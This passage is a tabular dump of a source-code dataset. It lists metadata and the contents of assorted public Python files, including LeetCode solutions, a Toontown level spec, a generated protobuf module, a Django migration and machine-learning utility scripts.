blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0a6d677d3bfe4d9fc3186df61d42fd1449051a94 | cb0e7d6493b23e870aa625eb362384a10f5ee657 | /solutions/python3/0239.py | 9306b2072110eb6570e723b0a84bc6ed856cb9dd | [] | no_license | sweetpand/LeetCode-1 | 0acfa603af254a3350d457803449a91322f2d1a7 | 65f4ef26cb8b2db0b4bf8c42bfdc76421b479f94 | refs/heads/master | 2022-11-14T07:01:42.502172 | 2020-07-12T12:25:56 | 2020-07-12T12:25:56 | 279,088,171 | 1 | 0 | null | 2020-07-12T15:03:20 | 2020-07-12T15:03:19 | null | UTF-8 | Python | false | false | 530 | py | class Solution:
def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:
ans = []
decreasingQueue = collections.deque()
for i, num in enumerate(nums):
while decreasingQueue and num > decreasingQueue[-1]:
decreasingQueue.pop()
decreasingQueue.append(num)
if i >= k - 1:
ans.append(decreasingQueue[0])
if nums[i - k + 1] == decreasingQueue[0]:
decreasingQueue.popleft()
return ans
| [
"[email protected]"
] | |
8e725276edde728b56862510da106778c1da2780 | 7f57c12349eb4046c40c48acb35b0f0a51a344f6 | /2017/002_AddTwoNumbers_v1.py | 1ea044ab8f4b389954d82f3afbf3dffdd586c7d5 | [] | no_license | everbird/leetcode-py | 0a1135952a93b93c02dcb9766a45e481337f1131 | b093920748012cddb77258b1900c6c177579bff8 | refs/heads/master | 2022-12-13T07:53:31.895212 | 2022-12-10T00:48:39 | 2022-12-10T00:48:39 | 11,116,752 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #!/usr/bin/env python
# encoding: utf-8
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @param {ListNode} l1
# @param {ListNode} l2
# @return {ListNode}
def addTwoNumbers(self, l1, l2):
head = p = None
carry = 0
while l1 or l2:
l1_val = l1.val if l1 else 0
l2_val = l2.val if l2 else 0
r = l1_val + l2_val + carry
if r >= 10:
carry = r // 10
r = r % 10
else:
carry = 0
if not p:
head = p = ListNode(r)
else:
p.next = ListNode(r)
p = p.next
if l1:
l1 = l1.next
if l2:
l2 = l2.next
if carry:
p.next = ListNode(1)
return head
def print_list(list_head):
print_l(list_head)
print '\n'
def print_l(list_head):
if list_head:
print list_head.val,
print_l(list_head.next)
if __name__ == '__main__':
l1a = ListNode(2)
l1b = ListNode(4)
l1c = ListNode(3)
l1a.next = l1b
l1b.next = l1c
l1 = l1a
l2a = ListNode(5)
l2b = ListNode(6)
l2c = ListNode(4)
l2a.next = l2b
l2b.next = l2c
l2 = l2a
s = Solution()
lr = s.addTwoNumbers(l1, l2)
print_list(l1)
print_list(l2)
print_list(lr)
print '>>>>>>'
l1a = ListNode(5)
l1 = l1a
l2a = ListNode(5)
l2 = l2a
s = Solution()
lr = s.addTwoNumbers(l1, l2)
print_list(l1)
print_list(l2)
print_list(lr)
| [
"[email protected]"
] | |
47fc7609c7840f44a8a36732191723aaed6399c9 | 45c170fb0673deece06f3055979ece25c3210380 | /toontown/coghq/BossbotCountryClubKartRoom_Battle00.py | 6209ace14272197b5d427ec788369610888baf8c | [] | no_license | MTTPAM/PublicRelease | 5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f | 825f562d5021c65d40115d64523bb850feff6a98 | refs/heads/master | 2021-07-24T09:48:32.607518 | 2018-11-13T03:17:53 | 2018-11-13T03:17:53 | 119,129,731 | 2 | 6 | null | 2018-11-07T22:10:10 | 2018-01-27T03:43:39 | Python | UTF-8 | Python | false | false | 1,780 | py | #Embedded file name: toontown.coghq.BossbotCountryClubKartRoom_Battle00
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotKartBoardingRm',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110400: {'type': 'battleBlocker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(4, 0, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1),
'cellId': 0,
'radius': 10},
110000: {'type': 'elevatorMarker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(26.854, 0, 0),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1, 1, 1),
'modelPath': 0},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110401: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(101.07, 0, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| [
"[email protected]"
] | |
d8194a910febb338161234dd2ca1b0ca28446a04 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03129/s416237729.py | 26351727aeb63985e21352d846400af1977248dc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | n,k = input().split()
n = int(n)
k = int(k)
for l in range(k):
l = 2*l +1
c = l
if c <= n:
print('YES')
else:
print('NO') | [
"[email protected]"
] | |
373acc2bcb313e92d96b6a0047fef866c1c722f7 | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/scratch/code2023/namespace.py | 99715efdf2a7cd185fc763fdba1aab4033c39f8a | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 5,654 | py | import logging
import os
from tensorflow.python.ops.summary_ops_v2 import create_file_writer
import trainer_v2.per_project.transparency.mmp.probe.probe_common
from cpath import output_path
from misc_lib import path_join
from trainer_v2.custom_loop.modeling_common.adam_decay import AdamWeightDecay
from trainer_v2.custom_loop.modeling_common.tf_helper import distribute_dataset
from trainer_v2.train_util.get_tpu_strategy import get_strategy2
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
from trainer_v2.chair_logging import c_log, IgnoreFilter, IgnoreFilterRE
import tensorflow as tf
from cpath import get_bert_config_path
from taskman_client.wrapper3 import report_run3
from trainer_v2.custom_loop.prediction_trainer import ModelV2IF, ModelV3IF
from trainer_v2.custom_loop.run_config2 import RunConfig2, get_run_config2
from trainer_v2.per_project.transparency.mmp.tt_model.model_conf_defs import InputShapeConfigTT, InputShapeConfigTT100_4
from trainer_v2.train_util.arg_flags import flags_parser
class LinearV3:
def __init__(self):
x = tf.keras.layers.Input(shape=(2,), dtype=tf.int32, name="x")
x_f = tf.cast(x, tf.float32)
y = tf.keras.layers.Dense(1)(x_f)
inputs = [x,]
output = {'pred': y}
self.model = tf.keras.models.Model(inputs=inputs, outputs=output)
def get_metrics(self) :
output_d = {}
metric = ProbeMAE("mae")
output_d["mae2"] = metric
return output_d
Metric = trainer_v2.per_project.transparency.mmp.probe.probe_common.Metric
class ProbeMAE(Metric):
def __init__(self, name, **kwargs):
super(ProbeMAE, self).__init__(name=name, **kwargs)
self.mae = self.add_weight(name='mae', initializer='zeros')
self.count = self.add_weight(name='count', initializer='zeros')
# self.metric_inner = tf.keras.metrics.MeanAbsoluteError()
def update_state(self, output_d, _sample_weight=None):
v = tf.reduce_sum(output_d['pred'])
self.mae.assign_add(v)
self.count.assign_add(1.0)
def result(self):
return self.mae / self.count
def reset_state(self):
self.mae.assign(0.0)
self.count.assign(0.0)
class LinearModel(ModelV3IF):
def __init__(self, input_shape: InputShapeConfigTT):
self.inner_model = None
self.model: tf.keras.models.Model = None
self.loss = None
self.input_shape: InputShapeConfigTT = input_shape
self.log_var = ["loss"]
def build_model(self):
self.inner_model = LinearV3()
def get_keras_model(self) -> tf.keras.models.Model:
return self.inner_model.model
def init_checkpoint(self, init_checkpoint):
pass
def get_train_metrics(self):
return {}
def get_train_metrics_for_summary(self):
return self.inner_model.get_metrics()
def get_loss_fn(self):
def get_loss(d):
return tf.reduce_sum(d['pred'])
return get_loss
@report_run3
def main(args):
c_log.info(__file__)
run_config: RunConfig2 = get_run_config2(args)
run_config.print_info()
input_shape = InputShapeConfigTT100_4()
model_v2 = LinearModel(input_shape)
optimizer = AdamWeightDecay(
learning_rate=1e-3,
exclude_from_weight_decay=[]
)
def build_dataset(input_files, is_for_training):
def generator():
for _ in range(100):
yield [0., 0.]
train_dataset = tf.data.Dataset.from_generator(
generator,
output_types=(tf.float32),
output_shapes=(tf.TensorShape([2])))
return train_dataset.batch(2)
strategy = get_strategy2(False, "")
train_dataset = build_dataset(run_config.dataset_config.train_files_path, True)
eval_dataset = build_dataset(run_config.dataset_config.eval_files_path, False)
dist_train_dataset = distribute_dataset(strategy, train_dataset)
eval_batches = distribute_dataset(strategy, eval_dataset)
train_log_dir = path_join(output_path, "train_log")
step_idx = 0
with strategy.scope():
model_v2.build_model()
train_summary_writer = create_file_writer(train_log_dir, name="train")
train_summary_writer.set_as_default()
train_metrics = model_v2.get_train_metrics_for_summary()
def train_step(item):
model = model_v2.get_keras_model()
with tf.GradientTape() as tape:
output_d = model(item, training=True)
step = optimizer.iterations
for name, metric in train_metrics.items():
metric.update_state(output_d)
sc = tf.summary.scalar(name, metric.result(), step=step)
print(sc)
return tf.constant(0.0)
@tf.function
def distributed_train_step(train_itr, steps_per_execution):
# try:
total_loss = 0.0
n_step = 0.
for _ in tf.range(steps_per_execution):
batch_item = next(train_itr)
per_replica_losses = strategy.run(train_step, args=(batch_item, ))
loss = strategy.reduce(
tf.distribute.ReduceOp.SUM, per_replica_losses, axis=None)
total_loss += loss
n_step += 1.
train_loss = total_loss / n_step
return train_loss
train_itr = iter(dist_train_dataset)
for m in train_metrics.values():
m.reset_state()
train_loss = distributed_train_step(train_itr, 1)
step_idx += 1
if __name__ == "__main__":
args = flags_parser.parse_args(sys.argv[1:])
main(args)
| [
"[email protected]"
] | |
777ffbf266467e0ceb8a71bb70445652547f6406 | cad91ae76d2746a6c28ddda0f33a58f9d461378f | /PyTorch/Forecasting/TFT/triton/runner/maintainer/docker/containers/__init__.py | cef46b3b10a7504c38e16e3ddf806649f598489b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | NVIDIA/DeepLearningExamples | fe677521e7e2a16e3cb0b77e358f9aab72f8c11a | a5388a45f71a949639b35cc5b990bd130d2d8164 | refs/heads/master | 2023-08-31T20:57:08.798455 | 2023-08-23T10:09:12 | 2023-08-23T10:09:12 | 131,881,622 | 11,838 | 3,124 | null | 2023-08-28T16:57:33 | 2018-05-02T17:04:05 | Jupyter Notebook | UTF-8 | Python | false | false | 673 | py | # Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .triton_server_container import TritonServerContainer
| [
"[email protected]"
] | |
6cedc11b21eb576d025e57da6ccc3febbc2bb6c4 | d2c80cd70f3220165c7add7ed9a103c0ed1ab871 | /python/HOMEWORK/5th_Session/Answers/Class/1/1.py | 37d69bb2650fbd94bf752634ed7bc727c291f579 | [] | no_license | nervaishere/DashTeam | 2a786af8a871200d7facfa3701a07f97230b706e | a57b34a601f74b06a7be59f2bfe503cbd2a6c15f | refs/heads/master | 2023-08-24T12:24:18.081164 | 2021-10-09T21:10:54 | 2021-10-09T21:10:54 | 393,689,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | a=int(input("enter your first number:" ))
b=int(input("enter your second number:" ))
c=int(input("enter your third number:" ))
maximum=max(a,b,c)
minimum=min(a,b,c)
if a==maximum and b==minimum:
print(a, c, b)
elif a==maximum and c==minimum:
print(a, b, c)
elif b==maximum and a==minimum:
print(b, c, a)
elif b==maximum and c==minimum:
print(b, a, c)
elif c==maximum and a==minimum:
print(c, b, a)
elif c==maximum and a==minimum:
print(c, a , b) | [
"[email protected]"
] | |
86afd457c842b29e419998349f8353c18483ab10 | 54ab0f79f5d68f4732ca7d205f72ecef99862303 | /benchmarks/distributed/rpc/parameter_server/metrics/ProcessedMetricsPrinter.py | 7ff8c3171a83336b367299649c37b08f416d7ca2 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | csarofeen/pytorch | a9dd0f8ffa0642d72df2d5e109a8b4d9c2389cbc | e8557ec5e064608577f81e51ccfe7c36c917cb0f | refs/heads/devel | 2023-04-30T02:42:13.558738 | 2023-03-14T00:50:01 | 2023-03-14T00:50:01 | 88,071,101 | 35 | 10 | NOASSERTION | 2023-06-21T17:37:30 | 2017-04-12T16:02:31 | C++ | UTF-8 | Python | false | false | 3,206 | py | import statistics
import pandas as pd
from tabulate import tabulate
class ProcessedMetricsPrinter:
def print_data_frame(self, name, processed_metrics):
print(f"metrics for {name}")
data_frame = self.get_data_frame(processed_metrics)
print(tabulate(data_frame, showindex=False, headers=data_frame.columns, tablefmt="grid"))
def combine_processed_metrics(self, processed_metrics_list):
r"""
A method that merges the value arrays of the keys in the dictionary
of processed metrics.
Args:
processed_metrics_list (list): a list containing dictionaries with
recorded metrics as keys, and the values are lists of elapsed times.
Returns::
A merged dictionary that is created from the list of dictionaries passed
into the method.
Examples::
>>> instance = ProcessedMetricsPrinter()
>>> dict_1 = trainer1.get_processed_metrics()
>>> dict_2 = trainer2.get_processed_metrics()
>>> print(dict_1)
{
"forward_metric_type,forward_pass" : [.0429, .0888]
}
>>> print(dict_2)
{
"forward_metric_type,forward_pass" : [.0111, .0222]
}
>>> processed_metrics_list = [dict_1, dict_2]
>>> result = instance.combine_processed_metrics(processed_metrics_list)
>>> print(result)
{
"forward_metric_type,forward_pass" : [.0429, .0888, .0111, .0222]
}
"""
processed_metric_totals = {}
for processed_metrics in processed_metrics_list:
for metric_name, values in processed_metrics.items():
if metric_name not in processed_metric_totals:
processed_metric_totals[metric_name] = []
processed_metric_totals[metric_name] += values
return processed_metric_totals
def get_data_frame(self, processed_metrics):
df = pd.DataFrame(
columns=['name', 'min', 'max', 'mean', 'variance', 'stdev']
)
for metric_name in sorted(processed_metrics.keys()):
values = processed_metrics[metric_name]
row = {
"name": metric_name,
"min": min(values),
"max": max(values),
"mean": statistics.mean(values),
"variance": statistics.variance(values),
"stdev": statistics.stdev(values)
}
df = df.append(row, ignore_index=True)
return df
def print_metrics(self, name, rank_metrics_list):
if rank_metrics_list:
metrics_list = []
for rank, metric in rank_metrics_list:
self.print_data_frame(f"{name}={rank}", metric)
metrics_list.append(metric)
combined_metrics = self.combine_processed_metrics(metrics_list)
self.print_data_frame(f"all {name}", combined_metrics)
def save_to_file(self, data_frame, file_name):
file_name = f"data_frames/{file_name}.csv"
data_frame.to_csv(file_name, encoding='utf-8', index=False)
| [
"[email protected]"
] | |
64a2f6689e74b94b8ed76e6cae0bed317078440b | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/204509/kaggle-liberty-mutual-group-master/code/correlation.py | b6f3c6e3fd83c3c6656f2ae5fe14cd5de6b86512 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
"""
simple code to calculate Pearson correlation between two results
"""
import pandas as pd
import numpy as np
print('Reading data...')
xgb1 = pd.read_csv("../output/xgboost_1.csv")
xgb2 = pd.read_csv("../output/xgboost_2.csv")
rf = pd.read_csv("../output/rf.csv")
gbm = pd.read_csv("../output/gbm.csv")
print(('Pearson correlation = ', np.corrcoef(gbm.Hazard, rf.Hazard)[0,1])) | [
"[email protected]"
] | |
7461637d40a3096ec3e12766fc5d9198b8cb2fdb | 3e4bb5b4036a66d25a72793c1deaa4f5572d37bf | /apps/pyvcal/tests/independent/revision.py | 8c3bae6df8ddd6187220622f0a6e5e8f2e1e65fd | [
"MIT"
] | permissive | hbussell/pinax-tracker | f7f7eb0676d01251d7d8832557be14665755844d | 4f6538324b2e1f7a8b14c346104d2f1bd8e1556b | refs/heads/master | 2021-01-20T12:06:29.630850 | 2010-02-03T00:39:05 | 2010-02-03T00:39:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,092 | py | import modulespecific
import unittest
class TestRevision(modulespecific.ModuleSpecificTestCase):
"""Test the Revision interface."""
def setUp(self):
"""Create and connect to a repository."""
self.basic_repo = self.test_module.BasicRepository()
self.repo = self.basic_repo.repo()
"""Get the latest revision from that repository."""
self.revisions = self.repo.revisions
self.head = self.repo.branches[""].head
def tearDown(self):
"""Destroy the created repository."""
self.basic_repo.teardown()
class TestRevisionPredecessors(TestRevision):
"""Test Revision.predecessors"""
def runTest(self):
"""Test that the latest revision returns the expected predecessor i.e: Revision(rev_num - 1)."""
# PROBLEM: This test fails (at least on git) because there is only ONE
# revision in the test repo, therefore self.head.properties.time is equal
# to predecessors[0].properties.time
predecessors = self.head.predecessors
self.assertEquals(1, len(predecessors))
self.assert_(self.head.properties.time > predecessors[0].properties.time)
self.assertEquals(predecessors[0].properties.commit_message, "Rename README.txt to README")
class TestRevisionGetProperties(TestRevision):
"""Test Revision.properties"""
def runTest(self):
"""Test that the 'basic' test Revision.properties returns a non-null properties object."""
props = self.head.properties
self.assert_(props)
self.assert_(props.committer)
self.assert_(props.time)
self.assert_(props.commit_message)
class TestRevisionDiffWithParents(TestRevision):
"""Test Revision.diff_with_parents"""
def runTest(self):
"""Test the get diff with parents returns a valid RevisionDiff object."""
diff = self.head.diff_with_parent
diff_value = diff.value
self.assertEquals("", diff_value)
#TODO need a better test... base on branch_and_merge test repo
| [
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5d074a0b8bca96ac9ec808db99922c922dfe31a1 | bc441bb06b8948288f110af63feda4e798f30225 | /monitor_sdk/model/flowable_service/process_instance_pb2.py | 4138e633ea17940cb65e4ffd486693a240303547 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 6,546 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: process_instance.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='process_instance.proto',
package='flowable_service',
syntax='proto3',
serialized_options=_b('ZJgo.easyops.local/contracts/protorepo-models/easyops/model/flowable_service'),
serialized_pb=_b('\n\x16process_instance.proto\x12\x10\x66lowable_service\"\xdc\x01\n\x0fProcessInstance\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\x1a\n\x12\x66lowableInstanceId\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x0f\n\x07\x63reator\x18\x04 \x01(\t\x12\r\n\x05\x63time\x18\x05 \x01(\t\x12\r\n\x05\x65time\x18\x06 \x01(\t\x12\x0e\n\x06status\x18\x07 \x01(\t\x12\x12\n\nstepIdList\x18\x08 \x03(\t\x12\x0e\n\x06stopAt\x18\t \x01(\t\x12\x13\n\x0bisSuspended\x18\n \x01(\x08\x12\x13\n\x0bisCancelled\x18\x0b \x01(\x08\x42LZJgo.easyops.local/contracts/protorepo-models/easyops/model/flowable_serviceb\x06proto3')
)
_PROCESSINSTANCE = _descriptor.Descriptor(
name='ProcessInstance',
full_name='flowable_service.ProcessInstance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='flowable_service.ProcessInstance.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='flowableInstanceId', full_name='flowable_service.ProcessInstance.flowableInstanceId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='flowable_service.ProcessInstance.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='flowable_service.ProcessInstance.creator', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ctime', full_name='flowable_service.ProcessInstance.ctime', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='etime', full_name='flowable_service.ProcessInstance.etime', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='flowable_service.ProcessInstance.status', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='stepIdList', full_name='flowable_service.ProcessInstance.stepIdList', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='stopAt', full_name='flowable_service.ProcessInstance.stopAt', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isSuspended', full_name='flowable_service.ProcessInstance.isSuspended', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isCancelled', full_name='flowable_service.ProcessInstance.isCancelled', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=45,
serialized_end=265,
)
DESCRIPTOR.message_types_by_name['ProcessInstance'] = _PROCESSINSTANCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ProcessInstance = _reflection.GeneratedProtocolMessageType('ProcessInstance', (_message.Message,), {
'DESCRIPTOR' : _PROCESSINSTANCE,
'__module__' : 'process_instance_pb2'
# @@protoc_insertion_point(class_scope:flowable_service.ProcessInstance)
})
_sym_db.RegisterMessage(ProcessInstance)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
e1777a1bf88087f70635240d8c7855eca9233d1a | cb35fffaab9650a8b89019a0269ad7cdf772f757 | /news/migrations/0001_initial.py | 849f2c75fec1aa5d94778cd7ca1fc5ab0994583d | [] | no_license | amazing22/my-second-blog | 6c75dddae2650269805edfa9c0f2b89ba6f1db48 | a5cc02663badcbb2efcaf6d291a634edbdb8a009 | refs/heads/master | 2021-08-08T03:19:58.404245 | 2017-11-09T12:32:22 | 2017-11-09T12:32:22 | 102,439,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,180 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-11 05:06
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pub_date', models.DateField()),
('headline', models.CharField(max_length=200)),
('content', models.TextField()),
],
),
migrations.CreateModel(
name='Reporter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(max_length=70)),
],
),
migrations.AddField(
model_name='article',
name='reporter',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='news.Reporter'),
),
]
| [
"[email protected]"
] | |
abb40f6104d91f9d09907f53c15d22b40b43d962 | 6f1e1c378997bf76942ce6e203e720035169ce27 | /104-maximum-depth-of-binary-tree.py | 7c47b2cce48c405645fdc77aba59813e9127047c | [
"MIT"
] | permissive | yuenliou/leetcode | a489b0986b70b55f29d06c2fd7545294ba6e7ee5 | e8a1c6cae6547cbcb6e8494be6df685f3e7c837c | refs/heads/main | 2021-06-16T07:47:39.103445 | 2021-05-11T09:16:15 | 2021-05-11T09:16:15 | 306,536,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | #!/usr/local/bin/python3.7
# -*- coding: utf-8 -*-
from collections import deque
from datatype.tree_node import TreeNode
class Solution:
def maxDepth(self, root: TreeNode) -> int:
"""dfs"""
if not root:
return 0
else:
l = self.maxDepth(root.left)
r = self.maxDepth(root.right)
# return l + 1 if l > r else r + 1
return max(l, r) + 1
def maxDepth2(self, root: TreeNode) -> int:
"""bfs"""
if not root: return 0
cnt = 0
queue = deque()
queue.append(root)
while len(queue): # isEmpty()
temp = []
# cnt = len(queue); while cnt: ...; cnt -= 1
for _ in range(len(queue)):
root = queue.pop() # list.pop(0)
temp.append(root.val)
if root.left:
queue.appendleft(root.left)
if root.right:
queue.appendleft(root.right)
cnt += 1
return cnt
def main():
root = TreeNode(3)
n2 = TreeNode(9)
n3 = TreeNode(20)
n4 = TreeNode(15)
n5 = TreeNode(7)
root.setLeftNode(n2)
root.setRightNode(n3)
n3.setLeftNode(n4)
n3.setRightNode(n5)
solution = Solution()
ret = solution.maxDepth2(root)
print(ret)
'''104. 二叉树的最大深度
给定一个二叉树,找出其最大深度。
二叉树的深度为根节点到最远叶子节点的最长路径上的节点数。
说明: 叶子节点是指没有子节点的节点。
示例:
给定二叉树 [3,9,20,null,null,15,7],
3
/ \
9 20
/ \
15 7
返回它的最大深度 3 。
